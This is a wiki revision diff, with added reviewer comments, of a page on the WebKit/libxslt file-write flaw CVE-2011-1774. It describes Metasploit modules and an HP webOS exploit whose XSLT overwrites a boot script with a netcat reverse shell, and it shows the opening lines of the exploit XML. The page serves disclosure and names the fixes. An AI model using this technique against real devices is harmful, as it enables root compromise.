Changes for page Application_Webkit

Last modified by Nicolas Gregoire on 2012/01/14 17:48

From version 16.1
edited by Nicolas Gregoire
on 2012/01/14 00:44
Change comment: There is no comment for this version
To version 9.1
edited by Nicolas Gregoire
on 2012/01/14 00:30
Change comment: Upload new image ipad-tmp-owned.png

Summary

Details

Page properties
Tags
... ... @@ -1,1 +1,0 @@
1 -webkit|libxslt|metasploit|webOS|Apple|Safari|iPhone|iPad|exploit
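Review bot: The comparison runs newer-to-older (the header goes from version 16.1 of 00:44 to version 9.1 of 00:30), so in this hunk and every hunk below, the `-` lines are the later text and the `+` lines are the earlier text; the `+1,0` side here means version 9.1 carried no tags, and the removed line `webkit|libxslt|metasploit|webOS|Apple|Safari|iPhone|iPad|exploit` is what the later version added. Reading the page in that direction keeps the wording defects on the `+` sides from being mistaken for regressions.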
Content
... ... @@ -26,16 +26,10 @@
26 26  Webkit uses [[libxslt>>Engine_libxslt]] as its XSLT engine. Old versions were not restricting __write__ access by the engine to the file system, leading to a remotely exploitable vulnerability ([[CVE-2011-1774>>http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1774||rel="__blank"]]). This was patched in [[Changeset 79159>>http://trac.webkit.org/changeset/79159||rel="__blank"]] by adding appropriate calls to xsltSetSecurityPrefs().
27 27  
28 28  
29 -PoC included on the [[libxslt>>Engine_libxslt]] page demonstrate the vulnerability :
29 +PoC included on the [[libxslt>>Engine_libxslt]] page demonstrate the vulnerability.
30 30  
31 -[[image:macos-tmp-owned.png||style="display: block; margin-left: auto; margin-right: auto"]]
31 +== Meatsploit ==
32 32  
33 -
34 -
35 -[[image:ipad-tmp-owned.png||style="display: block; margin-left: auto; margin-right: auto"]]
36 -
37 -== Metasploit ==
38 -
39 39  Two modules are included in Metasploit :
40 40  
41 41  * a [[auxiliary>>http://www.metasploit.com/modules/auxiliary/server/webkit_xslt_dropper||rel="__blank"]] working on any non-sandboxed non-patched Webkit device
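Review bot: The `+` side (version 9.1) carries a misspelled heading, `== Meatsploit ==`, which the `-` side (16.1) corrects to `== Metasploit ==`; the subject-verb disagreement in `PoC included on the [[libxslt>>Engine_libxslt]] page demonstrate the vulnerability` survives on both sides and should become either "PoCs ... demonstrate" or "The PoC ... demonstrates". The `-` side's ` :` before the list matches the spacing used elsewhere on the page (`Two modules are included in Metasploit :`), so that part is consistent. On substance, 16.1 adds the two screenshots `macos-tmp-owned.png` and `ipad-tmp-owned.png` as evidence of the file-write behaviour, which sits well next to the unchanged context naming the fix (Changeset 79159 adding xsltSetSecurityPrefs() calls), since that changeset is what a reader checking their own WebKit build against CVE-2011-1774 needs to confirm.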
... ... @@ -45,7 +45,5 @@
45 45  
46 46  An exploit for HP webOS 3.x was developed. This exploit drops a backdoor which is later executed with root privileges at boot time. The exploit is composed of two files :
47 47  
48 -* [[webos-root-backdoor.xml>>attach:webos-root-backdoor.xml]] contains the configurable data (name and content of the destination file) and a processing instruction triggering the XSLT code
42 +* [[webos-root-backdoor.xml>>attach:webos-root-backdoor.xml]] contains the configurable data (name and content of the destination file) and a processing instruction trigger the XSLT code
49 49  * [[webos-root-backdoor.xsl>>attach:webos-root-backdoor.xsl]] reads the XML file and create the requested file on disk. This version overwrites a script located in /etc/default/ with a version including a reverse-shell based on netcat
50 -
51 -Browsing the XML file from a vulnerable device is enough to trigger the exploit. This was patched during the 3.0.2 OTA update.
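Review bot: Both sides still read `reads the XML file and create the requested file on disk`, which should be `creates`; the `-` side (16.1) does fix `a processing instruction trigger the XSLT code` to `triggering`. The material difference is the closing sentence present only in 16.1, `Browsing the XML file from a vulnerable device is enough to trigger the exploit. This was patched during the 3.0.2 OTA update.`: the remediation version is the single fact a webOS user or administrator needs to judge whether a device remains exposed, so it belongs directly under the exploit description and should not be separated from it in later edits.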
macos-tmp-owned.png
Author
... ... @@ -1,1 +1,0 @@
1 -xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,1 +1,0 @@
1 -12.4 KB
Content
webos-root-backdoor.xml
Size
... ... @@ -1,1 +1,1 @@
1 -1721
1 +1711
Content
... ... @@ -1,5 +1,5 @@
1 1  <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
2 -<?xml-stylesheet type="text/xsl" href="webos-root-backdoor.xsl"?>
2 +<?xml-stylesheet type="text/xsl" href="xslt2root.xsl"?>
3 3  <exploit><location>/etc/default/mount_checks</location><content><![CDATA[# -*- mode: conf; -*-
4 4  
5 5  # Backdoor, by Nicolas Gregoire / Agarri
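Review bot: The `+` side (version 9.1) points the processing instruction at `href="xslt2root.xsl"`, a stylesheet not among the attachments listed on this page, while the `-` side (16.1) references `webos-root-backdoor.xsl`, which matches the attachment named in the content hunk above; the 10-byte difference between the two recorded sizes (1721 versus 1711) equals the length difference between the two file names, so the href rename is the only change to this attachment. From a detection standpoint, the indicators are fully visible in these five lines: an `<?xml-stylesheet?>` instruction loading an external XSL together with a `<location>` element naming `/etc/default/mount_checks` is what a content filter or proxy log review on an unpatched device would key on.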